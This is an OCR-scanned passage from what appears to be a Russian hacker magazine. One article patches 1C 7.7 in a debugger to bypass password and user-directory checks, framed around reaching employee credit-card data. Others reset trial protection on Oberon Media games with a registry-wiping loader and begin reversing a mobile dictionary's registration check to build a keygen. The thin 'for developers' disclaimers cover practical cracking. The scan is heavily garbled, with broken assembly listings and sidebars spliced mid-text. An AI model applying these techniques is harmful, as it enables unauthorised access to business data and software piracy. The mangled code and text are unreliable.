брутфорсер и пришел к выводу, что числовые па- 
роли взламываются очень быстро, но достаточно 
подключить символы и ограничить длину 8-10 
символами — и уже становится невесело, так как 
дело попахивает долгими часами перебора. Ты 
скажешь: «Да бухгалтеры для пароля всегда свой 
год рождения пишут!» В чем-то правильно, но... 
Последние тенденции в корпорациях и даже мел- 
ком бизнесе показывают стремление защитить 
информацию (данные о клиентах, поставщиках, 


микроскопический 


анализ 1С 


ПОЛУЧАЕМ ДОСТУП К БД 
С МАКСИМАЛЬНЫМИ ПРИВИЛЕГИЯМИ 


ОДНАЖДЫ ШЕФ ВЫЗВАЛ МЕНЯ К СЕБЕ И ПОСТАВИЛ ЗАДАЧУ: ПРОВЕСТИ АУДИТ 
БЕЗОПАСНОСТИ 1С И ПОПЫТАТЬСЯ ПОЛУЧИТЬ ДОСТУП К БАЗЕ ДАННЫХ, 
ЖЕЛАТЕЛЬНО С МАКСИМАЛЬНЫМИ ПРИВИЛЕГИЯМИ INCE 


оборотах предприятия) от кражи и от глаз весьма 
заинтересованных конкурентов. В борьбе за сох- 
ранность данных создаются службы безопасности, 
вводятся административные меры наказания, ми- 
нимальные требования к длине пароля и т.п. 
К примеру, в фирме, где работал я, мы сами зада- 
вали пароли и ставили вот такие условия: 

Длина = ВОСЕМЬ CUMBOMIOB 

Цифры + буквы + одна заглавная 


в английской раскладке. 


+> для промежуточного вывода могу сказать, 
что атака на изегз.изг имеет несколько недостатков: 


1 ПОДБОР ПАРОЛЯ ПЕРЕБОРОМ НЕ 
ВСЕГДА ОСУЩЕСТВИМ В КОРОТКИЕ 


СРОКИ, ОСОБЕННО ЕСЛИ ОСТАЛОСЬ 
РАБОТАТЬ ДВЕ НЕДЕЛИ :). 


2 ВРЯД ЛИ ПОЛУЧИТСЯ УДАЛИТЬ ФАЙЛ. 
ЛЮБОЙ НОРМАЛЬНЫЙ АДМИН ПОСТА- 
ВИТ НА НЕГО АТРИБУТ READONLY 
(ТОЛЬКО ДЛЯ ЧТЕНИЯ). ПОДМЕНИТЬ 
ХЭШ-СУММУ ТОЖЕ НЕ ПОЛУЧИТСЯ. 


Ну что ж, придется поступить хитрым образом. 
Учитывая свой опыт реверсера, я решил поковы- 
ряться в 1CV7s.exe (25-й релиз). Как выяснилось, 
не зря. Буква $ в конце имени файла указывает на 
SQL-Bepcuto, локальную и сетевую. Мой выбор пал 
именно на нее, одну из самых распространенных, 
неслучайно: она превосходно работает на Терми- 
Hane, поддерживает Kak DBF, так и ЗОЁ-базы, 


сохранение отчетов 

в формате Excel 

Если ты работал с 1С в крупной фирме 
или на оптовом предприятии, где форми- 
руют большие отчеты длиной в 3000 
строк и более, то ты сталкивался с проб- 
лемой сохранения в формате ХЕ$. Зако- 
вырка скрывается в технологии OLE, про- 
изводительность которой, увы, далеко не 
на высоте. Когда пытаешься сохраниться 
в формате ЕхсеГя, 1С’ка виснет... Ждем 
30 минут, час, а в ответ только тишина... 


ошибка блокировки 
каталога пользователя 

В 1С можно создать для каждого пользо- 
вателя отдельный каталог, чтобы там он 


Иногда подождешь несколько часов— и 
файл создастся. Эта проблема известна, 
с ней борются по-разному: 


1 СОХРАНЯЮТ ОТЧЕТ ЗА МЕНЬШИЙ 
ПЕРИОД. 


2 МИНИМИЗИРУЮТ ОФОРМЛЕНИЕ 
(ОТКЛЮЧАЮТ ЦВЕТА, ВЫРАВНИВА- 
НИЕ ИТ.П.). 


3 ИСПОЛЬЗУЮТ ВНЕШНИЕ HAPA- 
БОТКИ И Т.Д. 


сохранял свои отчеты и т.п. Бывает, при 
входе в 1С’ку выскакивает сообщение 
«Каталог пользователя занят» и прог- 
рамма завершает свою работу, хотя ка- 


В такой ситуации я иду по одному из двух 
путей: 


1 СОХРАНЯЮ В ФОРМАТЕ 1С (XL), 
ПОТОМ ПЕРЕИМЕНОВЫВАЮ РАСШИ- 
РЕНИЕ НА *.XLS И ОТКРЫВАЮ В 
EXCEL'E (ИНОГДА ФОРМАТИРОВАНИЕ 
НЕ СОХРАНЯЕТСЯ). 


2 СОХРАНЯЮ В HTML И ОТКРЫВАЮ В 
EXCEL, ФОРМАТИРУЮ И СОХРА- 
НЯЮ В ФОРМАТЕ *.XLS. 


талог не занят и 1С не видно в списке 
процессов. 

Я знаю только одно верное реше- 
ние — патч исполняемого файла. 


освобождает от головной боли насчет электрон- 
ных ключей (кто видел голубые экраны при уста- 
новке эмуляторов хаспов, тот поймет). 

> — перейдем к практике. Представим ситуацию, 
когда есть база данных по сотрудникам, помимо 
личных данных в ней хранится информация по 
кредитным картам. Конечно, мы не допущены 
к справочнику доступа, и, соответственно, нет до- 
ступа к документам на перевод/начисление де- 
нежных средств. Пора получить его. Первое, что 
приходит в голову, — убрать проверку пароля 
и входить под любым пользователем. 

Запускаем отладчик (я использовал Ol- 
lyDbg), в списке выбираем нужную базу и пытаем- 
ся авторизоваться как «Админ». Получаем сооб- 
щение об ошибке. 

Пойдем по классической схеме, ставим 
брэйкпоинт Ha МеззадеВохА (с учетом регистра): 
ВР MessageBoxA. Теперь на кнопку ОК, и мы вы- 
валились в: 


a DABCS Seas Dir CME 
DS: 77D5F2E4] ,0 
77D2BC3A 0F85 FSINZ USERS 2. 17036238 


[DWORD 


Это системная библиотека USER32.dll, а защита 
находится в коде самой программы (долго пры- 
гать по библиотекам сейчас не время, так как 
лишние мучения в 1С’ке, многослойном пироге с 
кучей используемых библиотек, ни к чему). Мои 
исследования привели к библиотеке: UserDef.dll. 
Имя О! совпадает с названием каталога, в кото- 
ром хранятся пароли пользователей. Вполне ло- 
гично, что разработчики вынесли авторизацию 
пользователей именно в нее. Итак, <Ctrl>+<F9>, 
закроем сообщение об ошибке ОК. Теперь ставим 
бряк на секцию кода dil, чтобы не прыгать по би- 
блиотекам и не терять свое время. Теперь <F9> — 
и мы находимся тут: 


260296АВ E8 C4B>CALL <JMP.&MFC42.#1199> 
; Вывод сообщения об ошибке 

26029680 68 2СЕ>РОЗН USERDEF.2604F62C 
26029685 8BCF МОУ ECX,EDI 


Поднимемся чуть выше: 


26029691 50 РОЗН ЕАХ 

he ЕЛИ TOU емо тие Inrsloxevieal 

26029692) Sil PUSH HEX 

; Sol Or шареля, введенноко нами 
26029693 FF15 2>CALL [DWORD 
DS:<&MSVCRT._mbscmp>] ; msvcrt._mbscmp 
; эта процедура сравнивает две строки 
и возвращает в регистре ЕАХ ноль, 

если строки равны, и -1, если строки 
различаются 

26029699 83C4 O>ADD ESP,8 


ZiEOAI6I9E 9550 TEST EAX, BAX 


2602969Е 5D POP EBP 
ZO02969R 5B POP EBX 
26029640 74 23 JE SHORT 


USERDEF .260296C5 

; если строки равны, продолжаем работу 
Итак, мы можем внести изменения в работу 
этого участка и заставить 1С думать, что ты 
вводишь пароль. Один из рецептов — передать 
в процедуру сравнения указатели на одну и ту 
же строку: 


26029691 50 РОЗН ЕАХ 

he ЕЛИ TOU емо тиайве Inrsloxevieal 
26029592 50 PUSH EAX 
Sol (Or настоящево: нароля 
26029693 FF15 2>CALL [DWORD 
DS:<&MSVCRT._mbscmp>] 


Теперь функция всегда будет возвращать вер- 
ное значение и мы сможем зайти под любым 
пользователем. После замены 1С запустит тебя 
в базу без нареканий. Однако, например, в мо- 
ей фирме для каждого пользователя заведен 
специальный каталог, и если пользователь с та- 
ким же именем сидит в базе, то мы увидим таб- 
личку весьма неприятного, я бы даже сказал от- 
рицательного, содержания :). 

> использование личных каталогов — доста- 
точно распространенное явление. Значит, мы дол- 
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жны убрать текущую проверку. Действуем по ука- 
занной выше схеме (бряк на MessageBoxA и нес- 
колько раз на <Ctrl>+<F9>, пока не окажешься в 
самом 1Cv7S.exe). 


00409075 E8 6C>CALL <JMP.&MFC42.#800> 
0040907А . 8A45 >MOV AL, [BYTE SS: 
ЕВР-61] 

00409070 84С0 TEST АБ, АП 

00409072 Wal 18 ali, SielOreue 
1cV7s.00409094 ; если каталог не занят, 
прыгаем 

00409081 о Е Е = 

00409083 и ПО) он: 210 

00409085 БОСС 

0040908А E8 2D>CALL <JMP.&MFC42.#1199> 


вывод сообщения об ошибке 
0040908Е E9 84>JMP 1CV7s.0040AF18 


Естественно, поменяв переход, мы пропускаем 
проверку и оказываемся в базе. 

Теперь можно вытворять в базе что угодно, 
если, конечно, права выбранного пользователя 
позволяют. 
> в этой статье я рассмотрел версию 1С 7.7. 
Почему не восьмерку? Во-первых, 7.7 до сих пор 
очень распространена, 95% моих знакомых поль- 
зуются именно ей. Во-вторых, восьмерка не ме- 
нее дырявая, чем 7.7. К такому выводу я пришел 
посмотрев на подход 1С к безопасности продук- 
тов. Чуть позже проверим еще раз. Администра- 
торам же советую использовать терминал с от- 
ключенным маппингом дисков или, при работе в 
обычном сетевом режиме, запускать 1С с права- 
ми другого пользователя (тогда не получится 
пропатчить чужой процесс), а на исполняемые 
файлы 1C однозначно ставить атрибут ReadOnly. 
Только не на всю папку, иначе она примется па- 
дать при запуске. 
> ну и напоследок. Могу пожелать удачи в ко- 
докопательстве, взломе, реверсинге и личной 
жизни :). Конечно же, употребляй полученные зна- 
ния, чтобы защитить себя или свою компанию от 
злых взломщиков. И будет тебе счастье A 


запуск ограниченного 
числа копий 1С 

На сервере моей фирмы был запрещен 
запуск 1С более пяти раз. То, сколько ко- 


искажение текста 

Еще одна распространенная проблема — 
искажение текста при копировании из 
буфера обмена при выставленной анг- 
лийской кодировке. 


тормоза с заставкой 

Такая проблема возникает как Ha win- 
dow’om RDP, так и Ha Citrix — при вхо- 
де в терминал долго висит заставка 


пий одновременно ты можешь открыть, 
может зависеть от конфигурации серве- 
ра. Эксперименты навели меня на мысль, 
что виновато ограничение на количество 


Такое наблюдается не только в 1С, ноив 
других программах, которые, видимо, ис- 
пользут недоработанную библиотеку. Как 
проявляется проблема: мы копируем 
текст, содержащий русские буквы, и 


1С, что связано с плавной перерисов- 
кой. Лечится эта проблема только пат- 
чем (Соарон) исполняемого файла, 

в результате 1С загружается гораздо 


файлов, открываемых в одной сессии. 
Решения пока не найдено. 

Свежие решения этого и других воп- 
росов смотрим на http://citrix.nm.ru, 


вставляем его в 1C — вместо нормаль- 
ных букв появляются каракули. Чтобы 
текст скопировался без искажения, дос- 
таточно перед вставкой текста переклю- 
чить раскладку на русский язык. 


шустрее. Всем терминальщикам — 
must have. Саороновский патч позволя- 
ет не только отключать и включать 
заставку ;). 
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подопытные 
ГОЛОВОЛОМКИ 


СНЯТИЕ ТНИАЕ-ЗАЩИТЫ С ОНЛАЙН-ИГР 


ВСЕГДА СИЛЬНО РАССТРАИВАЮСЬ, КОГДА ВИЖУ, ЧТО ПРОГРАММКА, ТОЛЬКО ЧТО 
СКАЧАННАЯ ИЗ ИНТЕРНЕТА, ВДРУГ НАЧИНАЕТ ПРОСИТЬ ЗА СЕБЯ М-Ю СУММУ. РАНЬ- 
ШЕ ПРИХОДИЛОСЬ ЛИБО ОТДАВАТЬ СВОИ КРОВНЫЕ, ЛИБО ИСКАТЬ АЛЬТЕРНАТИВЫ. 


БОЛЬШИНСТВО ПОЛЬЗОВАТЕЛЕЙ ДО СИХ ПОР ПОСТУПАЮТ ТОЧНО ТАК ЖЕ И ИДУТ 
НА КОМПРОМИС |PEEONIS (DEEONIS@GMAIL.COM; ICQ 982-622) 


Все знают, что такое ICQ, и многие пользуются 
стандартным клиентом ICQ Lite 4 или 5. Удиви- 
тельный клиент имеет надстройку Xtraz — на вид 
просто панелька, которая выдвигается с левого 
бока. Одна из возможностей этого расширения — 
маленькие забавные игрушки, предлагаемые 
пользователю. Если нравится Xtraz, качай полную 
версию с сайта games.icq.com, Все бы хорошо, HO 
красоте мешает одна мелочь. 

На всех игрушках с этого сайта стоит trial’Haa 
защита, причем очень жестокая: можно поиграть 
бесплатно всего час, наиграв больше — плати $19. 


Я обнаружил подковырку не сразу и скачал несколько 
игр, которые понравились мне. В какое же уныние я 
впал, когда понял, что поиграть в них так и не удастся. 

Однако мой дух не был сломлен до конца... Я 
решил исправить ситуацию, и, как ни странно, нашел 
решение в рекордно короткие сроки. Взлом будет 
продемонстрирован на примере игры Luxor — логиче- 
ской аркады, аналога знаменитой Хита. Из дополни- 


тельного софта была использована утилита WinTools 
(www.wintools.net), в которой есть возможность прове- 
сти полную деинсталляцию приложения. Кстати, нуж- 
но заметить: никогда не повторяй то, что проделал я! 
> установка, как ошибочно считают многие — 
это шаг, нужный только ламерам. Не спеши пропу- 
скать эту тему — фундамент взлома заложен именно 
здесь. Так что читаем внимательно и запоминаем. 


ДАННАЯ СТАТЬЯ НАПИ- 
САНА ДЛЯ ТОГО, ЧТО- 
БЫ ПОКАЗАТЬ РАЗРА- 
БОТЧИКАМ ПО НАС- 
КОЛЬКО СЛАБОЙ БЫ- 


ВАЕТ ЗАЩИТА ИХ ПРО- 
ДУКТОВ. АВТОР И РЕ- 
ДАКЦИЯ НЕ НЕСУТ ОТ- 
ВЕТСТВЕННОСТИ ЗА 
ПРИМЕНЕНИЕ ИНФОР- 
МАЦИИ В ПРОТИВОЗА- 
КОННЫХ ЦЕЛЯХ 


Как я уже сказал, нам потребуется утилита WinTo- 
ols. Ее можно найти на нашем диске или скачать 
в интернете с официального сайта. Запускаем, 
нажимаем на кнопку Clean Un (самая первая на 
левой панельке). Далее в основном окне програм- 
мы — нажать Create и подождать, пока создастся 
контрольная точка. По окончании процесса чуть 
ниже выбрать инсталляцию игры и надавить Вип. 
В конце установки оставить флажок, предлагаю- 
щий запустить игру по нажатию кнопки Finish. 

Сразу после этих действий перед нами появля- 
ется красивое окно, в его левой части расположена 
полоска, которая показывает, сколько времени оста- 
лось до окончания работы игры (должно быть 60 ми- 
нут), а в левой части — несколько кнопок. Тут нужно 
нажать Play Demo NOW. Нажимаем и, если хочется, 
чуть-чуть играем. Выходим из игры, закрываем по- 
явившееся окно и в WinTools жмем Analyse. Через не- 
которое время утилита предложит сохранить резуль- 
таты. Естественно, соглашаемся на сохранение. Если 
запустить игру еще раз, то мы увидим, что отведен- 
ное нам время уменьшилось на число, кратное пяти. 

Процесс установки закончен! Если кто-то не 
понял, объясню. Все хитрые манипуляции были 
направлены на то, чтобы отследить изменения, 
произошедшие после установки и первого запуска 
игры. Благодаря им WinTools сможет полностью 
удалить игру, даже файлы, оставленные родным 
uninstallerom. Однако мы воспользуемся этими 
сведениями немного по-другому. 
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Официальные изменения, внесенные игрой 


> поиск меток аГности. Нда-а, можно играть 
только час — не очень много. Где же игрушка хра- 
нит запись о том, сколько времени игрок провел 
за ней? В реестре? В принципе, правильно. Запу- 
скаем regedit.exe и смотрим. 

Любой человек, если он знает, что такое ре- 
естр, сразу посмотрит ветки в HKCU\Software 
и мгновенно обнаружит ветвь Oberon Media, а в 
ней — еще один раздел, который вместо имени 
имеет девятизначное число. Не теряя времени, 
заходим в этот раздел — сразу становится ясно, 
что цель достигнута: обнаруживаются такие клю- 
чи, как Registered, MaxUsage, KeyData и др. А вот 
и нет, как ни прискорбно... Разные манипуляции 
со значениями этих ключей не привели ни к чему 
хорошему: время, отведенное «свободной игре», 
продолжало неуклонно сокращаться. 


oes eer 
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Изменения, внесенные игрой в реестр 


Настало время «тяжелой артиллерии». Идем в ту 
папку, где установлена WinTools. Здесь находим 
каталог Data, в нем — директорию с именем, под 
которым были сохранены результаты работы ути- 
литы. Здесь интересуемся файлом registry.dog. 
Открываем его в текстовом редакторе — перед 
нами предстает список всех изменений, внесен- 
ных в реестр этой игрой. 

Однако как выяснить, что из найденного — 
тот самый заветный ключик, который отпирает все 
двери? Очень просто. Идем в папку, куда был 
установлен Luxor, и находим в ней файл install.log. 
Надеюсь, все уже догадались, что идея проста до 
безобразия: игра никогда не удалит метки trial’HO- 
сти, поэтому B install.log не окажется тех записей, 
которые есть в registry.dog, и они будут злосчаст- 
ными ключами реестра. 
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ЛИСТИНГИ 


Листинг №1. Пример загрузчика 


Вы 


Но не стоит удалять их все — некоторые могут 
оказаться довольно безобидными. Выберем 
только самые-самые подозрительные. На такой 
случай было бы хорошо иметь опыт, так как 
слишком бдительные люди могут забраковать 
все ключи, а слишком добрые — не заметить 
совсем ничего странного. Мне не понравились 
вот эти три записи: 


Насчет первой записи не возникает никаких сом- 
нений: она явно сгенерированна random’om и слу- 
жит меткой. Две другие я выбрал потому, что сло- 
BO «лицензия» вызывает у меня бурную аллерги- 


ческую реакцию с легкими приступами эпилепсии. 
Итак, удаляем их, запускаем игру и... 

3» BCe осталось по-прежнему, время не сброси- 
лось. Более того, оно продолжает уменьшаться. По- 
пытаемся удалить все оставшиеся «лишние» за- 
писи реестра — безрезультатно. И вдруг на ум 
приходит мысль: «А что если меткой служит еще и 
какой-нибудь файл на жестком диске???» 

Tam, где лежал registry.dog, находим Пага- 
disk.dog и всматриваемся в его содержимое. Если 
с первой попытки ты быстро обнаружил запись 
[HKEY_CLASSES_ROOT\CLSID\{942D82A5-DA03- 
640B-5E19-3CBD62700780}\|wP2ZA, то без труда 3a- 
метишь файл DB365884.TMP (лежит в C:\Docu- 
ments and Зе#тд$\Имя_пользователя\Еоса! Set- 
tings\Temp\). Его имя тоже довольно подозритель- 
но. Сначала я подумал, что этот файл создается 
во время установки игры и уже давно его нет там, 
но, как ни странно, он преспокойно, тихо и мирно 
лежал именно там. 


Присмотримся к этому файлу поближе. Содержа- 
ние не располагает ни к какому доверию, к тому 
же дата создания и модификации не соответству- 
ет действительности. Для того чтобы окончатель- 
но удостовериться в его виновности, запустим, а 
потом выключим игру еще раз и посмотрим, что 
произошло с ним. Как и предполагалось, дата соз- 
дания/модификации изменилась, причем вновь 
неправильно. Если приглядеться повнимательнее, 
то удастся заметить, что и содержание файла не 
сохранило первоначальный вид. Теперь точно из- 
вестно, что еще одним подозреваемым является 
DB365884.TMP. 

Теперь проверим, насколько точно были 
найдены все метки, оставленные игрушкой: уда- 
лим три вышеперечисленные записи в реестре и 
файл DB365884.TMP, запустим игру и... О чудо! 
Невероятно! Время опять сбросилось до 60-ти 
минут. Некоторые особо придирчивые, конечно же, 
спросят: «А что если отведенный час истечет во 
время игры?» Все будет нормально — из игры те- 
бя не выкинут. 

Хорошо, конечно, но как-то не очень хо- 
чется каждый раз править реестр и удалять 
файл из темповой директории. Вот и попробуем 
автоматизировать процесс — напишем спе- 
циальный загрузчик. 
> — алгоритм loader’a будет очень простым, но 
я все-таки распишу его довольно подробно: 


1 ОТКРЫТЬ КЛЮЧ HKEY_LOCAL_MACHI- 
NE\SOFTWARE\LICENSES И УДАЛИТЬ ДВА 
ПАРАМЕТРА, НУЖНЫЕ НАМ; 


2 ЗАКРЫТЬ КЛЮЧ HKEY_LOCAL_MACHI- 
NE\SOFTWARE\LICENSES; 


3 ОТКРЫТЬ КЛЮЧ HKEY_LOCAL_MACHI- 
NE\SOFTWARE\CLASSES\CLSID\{942D82A5- 
DA03-640B-5E19-3CBD62700780} И УДА- 
ЛИТЬ НУЖНЫЙ ПАРАМЕТР; 


4 ЗАКРЫТЬ КЛЮЧ HKEY_LOCAL_MACHI- 
NE\SOFTWARE\CLASSES\CLSID\{942D82A5- 
DA03-640B-5E19-3CBD62700780}; 


5 ПОЛУЧИТЬ АДРЕС ВРЕМЕННОЙ 
ДИРЕКТОРИИ; 


в УДАЛИТЬ ФАЙЛ DB365884.TMP; 


Инструмент исследователя 


7 ЗАПУСТИТЬ LAUNCH.EXE ИЗ КАТАЛО- 
ГА, КУДА УСТАНОВЛЕНА ИГРА. 


Замечу, что в третьем пункте списка значение 
{942D82A5-DA03-640B-5E19-3CBD62700780} отно- 
сится только к данной игрушке — другие же име- 
ют собственные GUID’bI. То же самое относится к 
имени файла на шестом шаге. 

Будем реализовывать Loader на WinAPI- 
функциях, чтобы сделать код более независимым 
от языка программирования. Эти функции будут 
вызваны при помощи С++. 

Теперь по порядку. Для открытия некоторого 
ключа реестра понадобится функция RegOpenkey. 
Вот ее прототип. 


параметр hKey — это значение базовой ветки ре- 
естра, где расположен нужный нам ключ. Для на- 
чала можно указать, например, HKEY_CURRENT_US- 
ЕВ или HKEY_LOCAL_MACHINE. 

|р5и6Кеу — указатель на нуль-терминальную стро- 
ку — содержит имя открываемого ключа в ветке. 
phkResult — это адрес хэндла открытого клю- 
ча. Функция запишет туда какое-то значение, и 
если вызов этой АР! завершится удачно, то вер- 
нется NULL, в противоположном случае — лю- 
бое другое ненулевое значение. Следующая нуж- 
ная нам функция: 


здесь hKey — опять же хэндл ключа, либо значе- 
ния по умолчанию (HKEY_CURRENT_USER ит.д.), 
либо хэндл, который НедОрепКеу записала по ад- 
pecy phkResult. 
IpValueName — указатель на строку, содержащую 
имя параметра, который должен быть удален. 
Если функция выполнилась успешно, то возвра- 
щается значение ERROR_SUCCESS. В противном 
случае — любое другое ненулевое значение. 

Для закрытия ключа вызывается функция 
RegCloseKey. 


Единственным ее параметром является хэндл на 
открытый ранее ключ. Возвращаемые значения — 
такие же, как и у предыдущей API. 

На этом работу с реестром прошу считать за- 
вершенной. Начинается сопение над файловой си- 
стемой. Напоминаю, что для работы игрушки без 
ограничений требуется удалить файл DB3658- 
84.ТМР из временного каталога, который не всег- 
да располагается в одном и том же месте, — это 
единственная проблема в данный момент. Так 
где именно искать? Чтобы знать точно, нужно 
определить полный путь до этой директории, что 


Мес ти 


Приветственное окно игры 


делается при помощи функции GetTempPath. 
Она описана ниже. 


nBufferLength — размер буфера, куда будет запи- 
сан полный путь. |рВиНег — сам буфер или, есте- 
ственно, строка (кому как нравится). 

Теперь, когда мы точно знаем место хране- 
НИЯ «нехорошего» файла, осталось лишь удалить 
его, для чего вызываем следующее: 


Единственным параметром этой функции явля- 
ется полное имя удаляемого файла. В случае 
успешного выполнения возвращается ненуле- 
вое значение. Для запуска самой игры исполь- 
зуем ShellExecute. 


Первым параметром этой функции является хэндл 
родительского окна. IpOperation — строка, содер- 
жащая вид операции, который должен быть произ- 
веден над файлом (например open или print). |pFi- 
le — собственно, и есть имя файла, который мы 
будем вызывать. |рРагатв{ег$ — параметры, KOTO- 
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рые передаются вызываемому приложению. |pDi- 
rectory — рабочая директория. nNShowCmd — ре- 
жим отображения. 

Теперь собрана полная информация, нужная что- 
бы написать собственный загрузчик к игре. Смело 
смотрим на листинг 1. 

>  Ша-защита пала. Может быть, кто-то задал- 
ся вопросом: отличаются ли (на других машинах) 
название {тр-файла и параметр в реестре, ис- 
пользуемые для контроля времени. Такие же по- 
дозрения в какой-то момент возникли и у меня, 
но их опровергли многочисленные тесты. Факти- 
чески, программисты ухищрялись зря. Собствен- 
но, они действовали по тому же принципу, как 
если бы кто-то повесил замок с идентификацией 
по сетчатке глаза на старую деревянную прог- 
нившую дверь. 

Более того, как я говорил выше, все игры на 
сайте games.icq.com под брендом Oberon Media име- 
ют похожий механизм защиты. То есть, как гово- 
рится, цепь крепка настолько, насколько прочно ее 
самое слабое звено. Получается, что человек, да- 
же очень неумелый в программировании, даже 
если он слабо представляет себе внутренние 
устройство Windows и не имеет никаких специали- 
зированных инструментов, сможет принести ги- 
гантские убытки целой компании. Процесс обнару- 
жения меток 1па!ности не составляет никакого тру- 
да, а написание Гоадегов еще проще: нужно всего 
лишь заменить несколько срок в шаблоне, кото- 
рый ты пишешь всего один раз. Особо ленивые мо- 
гут даже автоматизировать это дело № 
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ДАННАЯ СТАТЬЯ 
НАПИСАНА ЛИШЬ 

ДЛЯ ТОГО, ЧТОБЫ 
ПОКАЗАТЬ 
РАЗРАБОТЧИКАМ 
ПРОГРАММНОГО 
ОБЕСПЕЧЕНИЯ, 
НАСКОЛЬКО СЛАБОЙ 
БЫВАЕТ ЗАЩИТА ИХ 
ПРОДУКТОВ. АВТОР 

И РЕДАКЦИЯ НЕ НЕСУТ 
ОТВЕТСТВЕННОСТИ 
ЗА ПРИМЕНЕНИЕ 
ИНФОРМАЦИИ 

В ПРОТИВОЗАКОННЫХ 
ЦЕЛЯХ. 


> умение написать генератор ключей всегда 
требовало от исследователя хорошего знания ас- 
семблера, основных способов защиты, а иногда и 
высокого уровня общей эрудиции, так как никогда 
не знаешь, что разработчик захочет использовать 
для создания ключа: может, комплексные числа, а 
может, и уравнение Шреденгера. Пусть это заня- 
тие отнимает больше времени, чем пропатчива- 
ние (хотя если учитывать уровень современных 
защит и различных приемов, мешающих изме- 
нить код программы, получается как раз наобо- 
рот), оно обладает и плюсами, опровергнуть зна- 
чение которых невозможно. Например, разбирая 
алгоритм генерации, можно быть абсолютно уве- 
ренным, что не придется исправлять проверки це- 
лостности программы, убирать надписи «not regi- 
stered», искать по всему коду, а потом блокиро- 
вать назойливые окошки с напоминаниями об 
истечении срока эксплуатации. Кроме того, оче- 


ключевой 


процесс 


HANDANGO DYNAMIC REGISTRATION. 


CAM СЕБЕ ГЕНЕРАТОР 


ПРИЯТНО, КОГДА, ЗАГЛЯНУВ В ZIP-APXVB С «ЛЕКАСТВОМ» ДЛЯ ОЧЕРЕДНОЙ 
ПРОГРАММЫ, ТЫ ОБРАНУЖВАЕШЬ ТАМ НЕ ГЛАВНЫЙ ИСПОЛНЯЕМЫЙ ФАЙЛ, 
ИЗБАВЛЕННЫЙ ОТ ТРЕБОВАНИЙ УПЛАТИТЬ ПО СЧЕТУ, И НЕ МАЛЕНЬКИЙ ПАТЧ, 
СОЗДАННЫЙ ЧЬЕЙ-ТО УМЕЛОЙ РУКОЙ, А ГЕНЕРАТОР КЛЮЧЕЙ (ВОЗМОЖНО, 
ПЛОД ЧЬИХ-ТО ДОЛГИХ БЕССОННЫХ НОЧЕЙ). ЭТА СИТУАЦИЯ ЗНАКОМА МНОГИМ 
(НО НАДЕЮСЬ, ТЫ НЕ ТАКОЙ .) | @ETORIX 1 INTS [GETORIX@INT3.RU] 


видно, что все глюки программы останутся исклю- 
чительно на совести разработчика. Ну и, разуме- 
ется, только ключ способен дать это сладкое ощу- 
щение «купленности» дорогого программного 
продукта. Убедительно? Тогда перейдем к рас- 
смотрению процесса. 

> инструментарий исследователя приложений 
для WindowsMobile в последнее время немного из- 
менился. К примеру, основной компонент eMbed- 
ded Visual C++ 4.0 SP4 был заменен интерактив- 
ным дизассемблером IDA 4.9, в который включен 
WinCE Debugger. В результате было ускорено «об- 
щение» с устройством и получен «бальзам и опо- 
ласкиватель в одном флаконе», то есть исчезла 
необходимость переключаться между окнами от- 


ладчика и дизассемблера. К счастью, такая заме- 
на не является обязательной, поэтому все описан- 
ное ниже можно проделать и с использованием 
eVC. В принципе, этого достаточно, но могу посо- 
ветовать установить Microsoft Device Emulator, что- 
бы не губить реальное устройство. Поскольку раз- 
бор алгоритма подразумевает усиленное копание 
в коде ААМ ассемблера, добавлю к требованиям 
знание основ этого языка программирования. 

> — в качестве объекта исследования возьмем 
«Англо-английский толковый словарь Lexisgoo 
v2.4» с сайта www.ppelink.com и совместим приятное 
(изучение иностранного языка) с полезным (опыт 
исследования приложений для WindowsMobile). 
Программа не маленькая, целых 22 Мб, но мы все- 


таки задались целью узнать что-то новое и Hay- 
читься чему-то, а не повторять чужие действия, 
поэтому качать ее необязательно. 

Как обычно, для начала нужно установить про- 
грамму на КПК или на эмулятор, что можно сделать 
и через ActiveSync, или разворачиванием саб-файла 
непосредственно на КПК с помощью cabinstall. Да- 
лее скопируем исполняемый файл с КПК на ПК для 
последующего анализа. В IDA выбираем File > New, 
в появившемся окне жмем на закладку PDAs - 
Handhelds -» Phones, где из всего представленного 
разнообразия нам больше всего подходит PocketPC 
ARM Executable. В окне Wizard на первой странице 
выбираем обе галочки (Imported DLL options и Analy- 
sis options), на второй также отмечаем все (Create im- 
ports segment, Create Resource Segment). Остальные 
настройки оставляем по умолчанию, TO есть жмем 
«Далее» несколько раз. После закрытия Wizard нач- 
нется анализ исполняемого файла. Когда этот дли- 
тельный процесс подойдет к концу, первое, что мы 
сделаем, — внимательно просмотрим содержимое 
окна Strings Window. Очень скоро нам удастся 
обнаружить то, что в листинге IDA выглядит как 
«Строки сообщений для МеззадеВох». 

Перед нами список строк, которые использу- 
ются в сообщениях типа МеззадеВох, уведомляю- 
щих об успешной или неуспешной регистрации. 
Чтобы найти место, где вызывается та или иная 
строка, необходимо продвигаться вверх по пере- 
крестным ссылкам (XREF). Например, щелкнув по 
ссылке «DATA XREF: .text:off_2926C» (соответству- 
ет фразе об удачной регистрации), попадаем сюда: 


Снова щелкаем no «DATA XREF: .text:00029254» 
и, наконец, видим код («Сообщение об удачной 
регистрации»). 

Очевидно, что этот код формирует параметры 
сообщения об успешной регистрации (заголовок и 
текст «Thank you for registering our product»), после 
чего происходит вызов функции CWnd__Message- 
BoxW (более привычный Bug, CWnd::MessageBoxW). 
Переход Ha этот блок осуществляется с адреса 
29210, то есть проверка введенного ключа на пра- 
вильность и принятие решения о том, какое именно 
сообщение выводить пользователю, находится где- 
то выше. Поднимемся чуть выше к адресу 29210. 

Итак, решение принимается после загрузки из 
памяти и последующего анализа содержимого реги- 
стра НЗ. Если значение в ВЗ равно нулю, то переход 
ВМЕ не осуществляется, то есть формируется сооб- 
щение «The serial key you have entered is invalid». В 
противном случае (R3!=0) переход осуществляется. 
Таким образом, для успешной регистрации необхо- 
димо, чтобы значение, загружаемое в НЗ, было от- 
лично от нуля. Пролистав код программы немного 
выше, можно попытаться найти место, где это зна- 
чение записывается в память. Начало функции на- 
ходится по адресу 29130. Разберем основные мо- 
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строки сообщений для МеззадеВох 


j 


сообщение об удачной регистрации 


код начала функции принятия решения 


М 
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менты ее работы с самого начала (бросив взгляд 
на «Код начала функции принятия решения»). 
Функция начинается с проверки на наличие 
ключа в поле ввода. Если ключ не введен, то его 
значение заменяется кодом «00000». Далее из клю- 
ча удаляются все пробелы, символы переноса и та- 
буляции (функции CString::TrimLeft и CString::Trim- 
Right), затем строковое значение ключа переводит- 
ся в числовое функцией _wtol. Кроме того, в этом 
блоке кода нашего внимания требуют две вещи. 
